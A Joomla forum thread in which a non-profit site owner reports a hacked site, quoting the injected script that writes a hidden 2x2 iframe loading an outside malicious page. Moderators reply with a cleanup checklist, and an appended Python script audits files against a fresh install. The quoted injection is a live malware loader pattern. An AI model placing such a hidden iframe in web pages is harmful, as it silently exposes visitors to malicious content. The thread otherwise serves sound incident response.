The Joomla! Forum ™



PostPosted: Wed May 30, 2012 12:39 pm 
Joomla! Fledgling

Joined: Mon Mar 12, 2012 9:09 am
Posts: 2
Problem Description :: Forum Post Assistant (v1.2.1) : 30th May 2012 wrote:
when I check the source code of the site I see the code "iFrame Malware (<script type="text/javascript">document.write('<iframe src="http://rec-creations.xxx/adv.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');</script>) followed by the malware code (really long)
Log/Error Message :: Forum Post Assistant (v1.2.1) : 30th May 2012 wrote:
Google Chrome says Warning: Something's Not Right Here!
Actions Taken To Resolve by Forum Post Assistant (v1.2.1) 30th May 2012 wrote:
I've copied my entire site to my HDD and searched for the iframe string but can't find anything
Forum Post Assistant (v1.2.1) : 30th May 2012 wrote:
Basic Environment :: wrote:
Joomla! Instance :: Joomla! 1.5.20-Stable (senu takaa) 18-July-2010
Joomla! Configured :: Yes | Writable (644) | Owner: ameic (uid: 891991/gid: 235038) | Group: pg863176 (gid: 235038) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 0 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 1 | SSL: 0 | Error Reporting: -1 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.32.8-grsec-2.1.14-modsign-xeon-64 | Technology: x86_64 | Web Server: Apache | Encoding: gzip,deflate,sdch | Doc Root: /home/ameic/melbourneanimalrescue.org | System TMP Writable: Yes

PHP Configuration :: Version: 5.2.17 | PHP API: cgi-fcgi | Session Path Writable: Unknown | Display Errors: 1 | Error Reporting: 6135 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 7M | Max. POST Size: 8M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 90M

MySQL Configuration :: Version: 5.1.53-log (Client:5.0.51a) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 4.89 MiB | #of _FPA_TABLE: 47
Detailed Environment :: wrote:
PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | hash (1.0) | filter (0.11.0) | ftp () | gd () | gettext () | session () | iconv () | standard (5.2.17) | json (1.2.1) | mbstring () | mcrypt () | mhash () | mysql (1.0) | SimpleXML (0.1) | pcntl () | SPL (0.2) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | posix () | pspell () | Reflection (0.1) | imap () | mysqli (0.1) | sockets () | SQLite (2.0-dev) | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | cgi-fcgi () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions :: zip | suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: None
Extensions Discovered :: wrote:
Components :: SITE :: MailTo (1.5.0) | Wrapper (1.5.0) | User (1.5.0) | WF_TABLE_TITLE (2.0.21) | WF_LAYER_TITLE (2.0.21) | WF_SOURCE_TITLE (2.0.21) | WF_PASTE_TITLE (2.0.21) | WF_ARTICLE_TITLE (2.0.21) | WF_LINK_TITLE (2.0.21) | WF_DIRECTIONALITY_TITLE (2.0.21) | WF_IMGMANAGER_TITLE (2.0.21) | WF_TEXTCASE_TITLE (2.0.21) | WF_BROWSER_TITLE (2.0.21) | WF_XHTMLXTRAS_TITLE (2.0.21) | WF_CONTEXTMENU_TITLE (2.0.21) | WF_VISUALCHARS_TITLE (2.0.21) | WF_STYLE_TITLE (2.0.21) | WF_SEARCHREPLACE_TITLE (2.0.21) | WF_CLEANUP_TITLE (2.0.21) | WF_SPELLCHECKER_TITLE (2.0.21) | WF_AUTOSAVE_TITLE (2.0.21) | WF_NONBREAKING_TITLE (2.0.21) | WF_MEDIA_TITLE (2.0.21) | WF_FULLSCREEN_TITLE (2.0.21) | WF_PRINT_TITLE (2.0.21) | WF_INLINEPOPUPS_TITLE (2.0.21) | WF_PREVIEW_TITLE (2.0.21) | WF_MEDIAPLAYER_JCEPLAYER_TITLE (2.0.21) | WF_POPUPS_JCEMEDIABOX_TITLE (2.0.21) | WF_POPUPS_WINDOW_TITLE (2.0.21) | WF_LINKS_JOOMLALINKS_TITLE (2.0.21) | WF_FILESYSTEM_JOOMLA_TITLE (2.0.21) | WF_AGGREGATOR_VIMEO_TITLE (2.0.21) | WF_AGGREGATOR_YOUTUBE_TITLE (2.0.21) |
Components :: ADMIN :: User Manager (1.5.0) | Newsfeeds (1.5.0) | Form Maker (1.1.2) | Trash (1.0.0) | Module Manager (1.5.0) | Frontpage (1.5.0) | Messaging (1.5.0) | Media Manager (1.5.0) | Plugin Manager (1.5.0) | Control Panel (1.5.0) | Search (1.5.0) | Content Page (1.5.0) | Installation Manager (1.5.0) | Language Manager (1.5.0) | Contact Items (1.0.0) | Polls (1.5.0) | Template Manager (1.5.0) | ImageShow (2.4.0) | Mass Mail (1.5.0) | Menus Manager (1.5.0) | Configuration Manager (1.5.0) | Cache Manager (1.5.0) | Weblinks (1.5.0) | Editor - JCE (2.0.21) | Unknown (-) | JCE (2.0.21) | Banners (1.5.0) |

Modules :: SITE :: Feed Display (1.5.0) | Who\'s Online (1.0.0) | Custom HTML (1.5.0) | Facebook Like Box (2.2) | Banner (1.5.0) | Sections (1.5.0) | Menu (1.5.0) | Newsflash (1.5.0) | Facebook FanBox (1.5.x.0) | Most Read Content (1.5.0) | Wrapper (1.0.0) | Search (1.0.0) | Login (1.5.0) | Footer (1.5.0) | Archived Content (1.5.0) | Random Image (1.5.0) | Form Maker Module (1.1.2) | Syndicate (1.5.0) | Latest News (1.5.0) | JSN ImageShow (2.3.4) | Related Items (1.0.0) | Breadcrumbs (1.5.0) | Statistics (1.5.0) | Poll (1.5.0) |
Modules :: ADMIN :: Unread Items (1.0.0) | Feed Display (1.5.0) | Online Users (1.0.0) | Toolbar (1.0.0) | Custom HTML (1.5.0) | Popular Items (1.0.0) | Title (1.0.0) | Latest News (1.0.0) | Logged in Users (1.0.0) | Admin Submenu (1.0.0) | Login Form (1.0.0) | User Status (1.5.0) | Footer (1.0.0) | Admin Menu (1.0.0) | Quick Icons (1.0.0) | Items Stats (1.0.0) |

Plugins :: SITE :: XML-RPC - Blogger API (1.0) | XML-RPC - Joomla API (1.0) | System - Mootools Upgrade (1.5) | System - SEF (1.5) | System - Remember Me (1.5) | System - Debug (1.5) | System - Backlinks (1.5) | System - Cache (1.5) | System - Log (1.5) | System - JSN ImageShow (2.3.4) | System - Legacy (1.5) | Authentication - LDAP (1.5) | Authentication - OpenID (1.5) | Authentication - GMail (1.5) | Authentication - Joomla (1.5) | Authentication - Example (1.5) | Content - Vote (1.5) | Content - Code Highlighter (Ge (1.5) | Content - Pagebreak (1.5) | Content - Load Form Maker (1.1.2) | Content - Page Navigation (1.5) | Content - Email Cloaking (1.5) | jLike (1.0.7) | Content - Load Modules (1.5) | Content - JSN ImageShow (2.3.4) | Content - Example (1.0) | Search - Sections (1.5) | Search - Content (1.5) | Search - Categories (1.5) | Search - Newsfeeds (1.5) | Search - Weblinks (1.5) | Search - Contacts (1.5) | Button - Pagebreak (1.5) | Button - Readmore (1.5) | Button - Image (1.0.0) | User - Joomla! (1.5) | User - Example (1.0) | Editor - JCE (2.0.21) | Editor - XStandard Lite for Jo (1.0) | Editor - TinyMCE 3 (3.2.6) |
Templates Discovered :: wrote:
Templates :: SITE :: JA_Purity (1.2.0) | ds_busuit (1.0.0) | beez (1.0.0) | JSN_Epic_FREE (3.6) | rhuk_milkyway (1.0.2) |
Templates :: ADMIN :: Khepri (1.0) |


I've searched for days for this code, and although I can see it when I look at the page's source code, I can't find it in any of the php, .js and html files... I run this site on behalf of a non-profit dog shelter, please help


Last edited by mandville on Wed May 30, 2012 12:50 pm, edited 1 time in total.
broke link to malicious site


PostPosted: Wed May 30, 2012 12:59 pm
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11706
Location: The Girly Side of Joomla in Sussex
please follow the listed procedure for dealing with hacked sites, security checklist 7

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


PostPosted: Thu May 31, 2012 10:05 am
Joomla! Fledgling

Joined: Mon Mar 12, 2012 9:09 am
Posts: 2
Hi, I'll complete the checklist as advised, however please advise where the code can have been injected into the site


PostPosted: Mon Jun 04, 2012 6:26 pm
Joomla! Hero

Joined: Sat Oct 21, 2006 10:20 pm
Posts: 2702
Location: Wisconsin USA
mandville wrote:
please follow the listed procedure for dealing with hacked sites, security checklist 7


Anywhere.

That is the reason for following the checklist.

Also your Joomla install (Joomla! 1.5.20) is way out of date and has security issues.

Follow:
PhilD wrote:

Before you post your security/been hacked topic, it is suggested to do all of the following. Failure to follow the suggestions below may leave your site vulnerable to being hacked again in the future.


You must state what version of Joomla you were using when the site first became hacked. This can make a difference as to how we approach your individual situation.

[ ] Ensure you have the latest version of Joomla for your 1.5 or 2.5 version of Joomla. Delete all files in your Joomla installation, saving a copy of the configuration.php file.

[ ] Review Vulnerable Extensions List to make sure any 3rd party extensions versions used appear on the vulnerable list.

[ ] Review and action Security Checklist 7 Make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc. Checklist 7 contains a list of recommended scanners.

[ ] Change all passwords and if possible user names for the website host control panel. Change the Joomla database user name and password.

[ ] Use proper permissions on files and directories. They should never be 777, ideal is 644 for files and 755 for directories. The configuration file can be set to 444 which is read only.

[ ] Check your htaccess for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled.

[ ] Verify individually that any non-Joomla file such as but not limited to that will be placed back on the website such as images, pdf files, files for download, and other documents and files are valid and are supposed to be part of your website.

[ ] Replace the deleted files with fresh copies of a current full version of Joomla (minus the installation directory) you downloaded earlier. Install freshly downloaded copies of any extensions and templates used on the site. If the Joomla database user name and password were changed earlier, then make the necessary changes to the configuration.php file and upload a copy to the website. Upload any non-Joomla files that are necessary for your website. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in various files and directories. More detailed information can be found in the security Checklist 7 link below.

Note: The forum post tool will work with all versions of Joomla.

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator
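
Added example, not part of the thread or of any Joomla tooling: a Python audit that supports the checklist steps on file permissions, verifying non-Joomla files, and replacing files with fresh copies, by comparing a downloaded copy of the site against a freshly unpacked package of the same Joomla version. The function names (`sha256_of`, `walk_files`, `audit_site`, `demo`) and the sample trees are constructed for illustration; it assumes both trees sit on a local disk.

```python
import hashlib
import os
import stat
import tempfile

def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()

def walk_files(root):
    """Yield (relative, absolute) paths of regular files under root, skipping symlinks."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if not os.path.islink(full):
                yield os.path.relpath(full, root), full

def audit_site(site_root, pristine_root):
    """Diff a site copy against a fresh package; flag group/world-writable paths (vs 644/755)."""
    pristine = {rel: sha256_of(full) for rel, full in walk_files(pristine_root)}
    report = {"modified": [], "extra": [], "loose_perms": []}
    for rel, full in walk_files(site_root):
        if rel not in pristine:
            report["extra"].append(rel)      # uploads, extensions, config, or planted files
        elif sha256_of(full) != pristine[rel]:
            report["modified"].append(rel)   # core file whose content changed
    for dirpath, dirs, files in os.walk(site_root):
        for name in dirs + files:
            full = os.path.join(dirpath, name)
            mode = stat.S_IMODE(os.lstat(full).st_mode)
            if not os.path.islink(full) and mode & (stat.S_IWGRP | stat.S_IWOTH):
                report["loose_perms"].append((os.path.relpath(full, site_root), oct(mode)))
    return {key: sorted(found) for key, found in report.items()}

def demo():
    """Audit two small constructed trees (sample data, not a real site)."""
    samples = [  # (tree, relative path, content, mode), all constructed
        ("fresh", "index.php", b"<?php // core\n", 0o644),
        ("site", "index.php", b"<?php // core\n// appended\n", 0o644),
        ("site", "configuration.php", b"<?php // settings\n", 0o444),
        ("site", "images/upload.php", b"<?php // unexpected\n", 0o666),
    ]
    with tempfile.TemporaryDirectory() as tmp:
        for tree, rel, content, mode in samples:
            path = os.path.join(tmp, tree, rel)
            os.makedirs(os.path.dirname(path), mode=0o755, exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(content)
            os.chmod(path, mode)
        return audit_site(os.path.join(tmp, "site"), os.path.join(tmp, "fresh"))
```

Every entry under `extra` still needs the individual review the checklist asks for, since legitimate uploads, third-party extensions and `configuration.php` land there alongside anything planted. A file-level audit like this does not cover content stored in the database.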

